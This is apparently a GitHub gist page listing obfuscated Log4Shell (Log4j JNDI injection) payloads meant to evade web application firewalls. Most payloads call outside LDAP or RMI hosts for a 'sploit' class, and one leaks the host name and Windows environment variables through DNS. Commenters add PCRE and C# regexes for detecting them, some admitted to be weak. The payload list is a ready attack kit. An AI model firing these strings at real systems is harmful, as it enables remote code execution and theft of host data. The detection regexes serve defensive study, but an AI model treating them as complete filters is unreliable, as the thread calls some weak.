Collection of WAF evasion payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ${jndi:ldap://127.0.0.1:1389/ badClassName} | |
| ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk} | |
| ${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${upper:j}${upper:n}${upper:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk} | |
| ${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk} | |
| ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.${env:COMPUTERNAME}.${env:USERDOMAIN}.${env}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk} |
This is the best I could find at the moment, https://twitter.com/egglessness_/status/1470184935730434050
I wrote this PCRE; I am it's author. I found it matches all evasion samples shared above. Good luck - Nathan Fowler!
/[uperlow\x24-\x26\x28\29\x5b\x5d\x7b\x7d\x3a-]+[Jj][uperlow\x24-\x26\x28\29\x5b\x5d\x7b\x7d\x3a-]*[Nn][uperlow\x24-\x26\x28\29\x5b\x5d\x7b\x7d\x3a-]*[Dd][uperlow\x24-\x26\x28\29\x5b\x5d\x7b\x7d\x3a-]*[Ii]/
You can find the implementation of F5 in the following link https://support.f5.com/csp/article/K19026212
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Got any regex that covers these cases?
I've got the following 2 together but they seem to be weak.
var jndiRegex = @"$({|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+";
var obfuscated_regex = @"/(?:$|%24)(?:{|%7b)[^\w]?j[^\w]?n[^\w]?d[^\w]?i[^\w]*?(?::|%3a)/i";